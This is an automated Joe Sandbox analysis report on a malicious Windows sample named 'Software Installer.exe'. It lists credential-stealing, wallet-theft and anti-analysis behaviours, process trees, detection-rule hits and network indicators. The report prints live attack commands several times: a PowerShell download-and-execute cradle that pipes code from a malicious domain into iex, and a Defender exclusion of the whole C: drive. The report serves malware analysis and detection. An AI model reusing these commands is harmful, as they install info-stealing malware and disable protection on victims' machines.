Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Software Installer.exe

Overview

General Information

Sample name:Software Installer.exe
Analysis ID:1638808
MD5:03ee281b5c88911c6b6f68c0fcb561ca
SHA1:4bcea9df6704f364be972b22218ad74b845972d9
SHA256:dec4046b525ec4584bee143b78e3ff0e52640c76a6a8c1390ba9a061888a7b6b
Tags:exeuser-TornadoAV_dev
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Contains functionality to inject code into remote processes
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Software Installer.exe (PID: 332 cmdline: "C:\Users\user\Desktop\Software Installer.exe" MD5: 03EE281B5C88911C6B6F68C0FCB561CA)
    • powershell.exe (PID: 7032 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7064 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1388 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Microsoft_Driver_vs_2019.exe (PID: 6976 cmdline: "C:\Users\user\Microsoft_Driver_vs_2019.exe" MD5: F9F46E1BC998F0EBA758D7B1E0D7A6C3)
      • conhost.exe (PID: 1652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 8060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7064INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xb87:$b3: ::UTF8.GetString(
  • 0x8392:$b3: ::UTF8.GetString(
  • 0x29cdc:$b3: ::UTF8.GetString(
  • 0x29d7d:$b3: ::UTF8.GetString(
  • 0x17f4f8:$b3: ::UTF8.GetString(
  • 0x1ade6b:$b3: ::UTF8.GetString(
  • 0x1af3e8:$b3: ::UTF8.GetString(
  • 0x1af61c:$b3: ::UTF8.GetString(
  • 0x1af9de:$b3: ::UTF8.GetString(
  • 0x1afa7f:$b3: ::UTF8.GetString(
  • 0x1c2c56:$b3: ::UTF8.GetString(
  • 0x1c2cfb:$b3: ::UTF8.GetString(
  • 0x1c2faa:$b3: ::UTF8.GetString(
  • 0x1c3218:$b3: ::UTF8.GetString(
  • 0x1cc3e7:$b3: ::UTF8.GetString(
  • 0x1cd117:$b3: ::UTF8.GetString(
  • 0x2b31d7:$b3: ::UTF8.GetString(
  • 0x2b4cd4:$b3: ::UTF8.GetString(
  • 0x2b4d75:$b3: ::UTF8.GetString(
  • 0x3b5f6:$s1: -join
  • 0x48877:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", ProcessId: 7064, ProcessName: powershell.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7032, ProcessName: powershell.exe
Sigma detected: Silenttrinity Stager Msbuild Activity
Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8060, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49725
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", ProcessId: 7064, ProcessName: powershell.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", ProcessId: 7064, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7032, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex", ProcessId: 7064, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Software Installer.exe", ParentImage: C:\Users\user\Desktop\Software Installer.exe, ParentProcessId: 332, ParentProcessName: Software Installer.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 7032, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-14T19:43:46.164328+010020283713Unknown Traffic192.168.2.549725188.114.97.3443TCP
2025-03-14T19:43:48.116256+010020283713Unknown Traffic192.168.2.549729188.114.97.3443TCP
2025-03-14T19:43:49.206224+010020283713Unknown Traffic192.168.2.549730188.114.97.3443TCP
2025-03-14T19:43:50.419358+010020283713Unknown Traffic192.168.2.549732188.114.97.3443TCP
2025-03-14T19:43:51.807938+010020283713Unknown Traffic192.168.2.549733188.114.97.3443TCP
2025-03-14T19:43:53.426240+010020283713Unknown Traffic192.168.2.549734188.114.97.3443TCP
2025-03-14T19:43:55.811500+010020283713Unknown Traffic192.168.2.549735188.114.97.3443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-14T19:43:34.803309+010028033053Unknown Traffic192.168.2.549710104.26.13.20580TCP
2025-03-14T19:43:35.303339+010028033053Unknown Traffic192.168.2.549711208.95.112.180TCP
2025-03-14T19:43:37.287689+010028033053Unknown Traffic192.168.2.549713104.26.13.20580TCP
2025-03-14T19:43:37.303339+010028033053Unknown Traffic192.168.2.549711208.95.112.180TCP
2025-03-14T19:43:41.968876+010028033053Unknown Traffic192.168.2.549718104.26.13.20580TCP
2025-03-14T19:43:41.968965+010028033053Unknown Traffic192.168.2.549717104.26.13.20580TCP
2025-03-14T19:43:42.006449+010028033053Unknown Traffic192.168.2.549711208.95.112.180TCP
2025-03-14T19:43:42.382261+010028033053Unknown Traffic192.168.2.549719208.95.112.180TCP
2025-03-14T19:43:42.895101+010028033053Unknown Traffic192.168.2.549720172.67.159.94443TCP
2025-03-14T19:43:43.117187+010028033053Unknown Traffic192.168.2.549721172.67.159.94443TCP
2025-03-14T19:43:45.506475+010028033053Unknown Traffic192.168.2.549723104.26.13.20580TCP
2025-03-14T19:43:45.584590+010028033053Unknown Traffic192.168.2.549719208.95.112.180TCP
2025-03-14T19:43:45.678631+010028033053Unknown Traffic192.168.2.549724172.67.159.94443TCP
2025-03-14T19:43:50.494726+010028033053Unknown Traffic192.168.2.549731172.67.159.94443TCP
2025-03-14T19:43:59.102264+010028033053Unknown Traffic192.168.2.549736172.67.159.94443TCP
2025-03-14T19:44:15.707739+010028033053Unknown Traffic192.168.2.549739172.67.159.94443TCP
2025-03-14T19:44:48.336079+010028033053Unknown Traffic192.168.2.549740172.67.159.94443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-14T19:43:24.564383+010018100002Potentially Bad Traffic192.168.2.549709172.67.159.94443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://citydisco.bet/gdJISzAvira URL Cloud: Label: malware
Source: https://citydisco.bet/yAvira URL Cloud: Label: malware
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041C833 CryptUnprotectData,CryptUnprotectData,13_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041BCC0 CryptUnprotectData,13_2_0041BCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041C833 CryptUnprotectData,CryptUnprotectData,13_2_0041C833
Source: unknownHTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: Software Installer.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Software Installer.exe, 00000000.00000002.2652976429.000001D775200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655712102.000001D7781F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655625974.000001D778160000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649808115.000001D7732F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648012640.00000196DE210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdb source: Software Installer.exe, 00000000.00000002.2655586732.000001D778140000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652602234.000001D775061000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652996729.000001D775210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655229213.000001D777EC1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655043542.000001D777CC0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2653230217.000001D776CF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\Release\net8.0\System.Runtime.Serialization.Json.pdb source: Software Installer.exe, 00000000.00000002.2653928289.000001D777580000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655435986.000001D7780C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654964425.000001D777C50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654918441.000001D777C20000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654629650.000001D777A61000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: Software Installer.exe, 00000000.00000002.2655879109.000001D7782A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256v source: Software Installer.exe, 00000000.00000002.2653520316.000001D776DF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652246216.000001D774FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654538768.000001D777A21000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653368487.000001D776D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653138908.000001D775280000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Software Installer.exe, 00000000.00000002.2654113621.000001D777640000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Software Installer.exe, 00000000.00000002.2655566992.000001D778130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Software Installer.exe, 00000000.00000002.2652519231.000001D775040000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649882906.000001D773301000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256j?X source: Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656547373.000001D778871000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652407174.000001D775011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\Release\net8.0\System.Runtime.Serialization.Json.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2653928289.000001D777580000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2653023838.000001D775240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmp
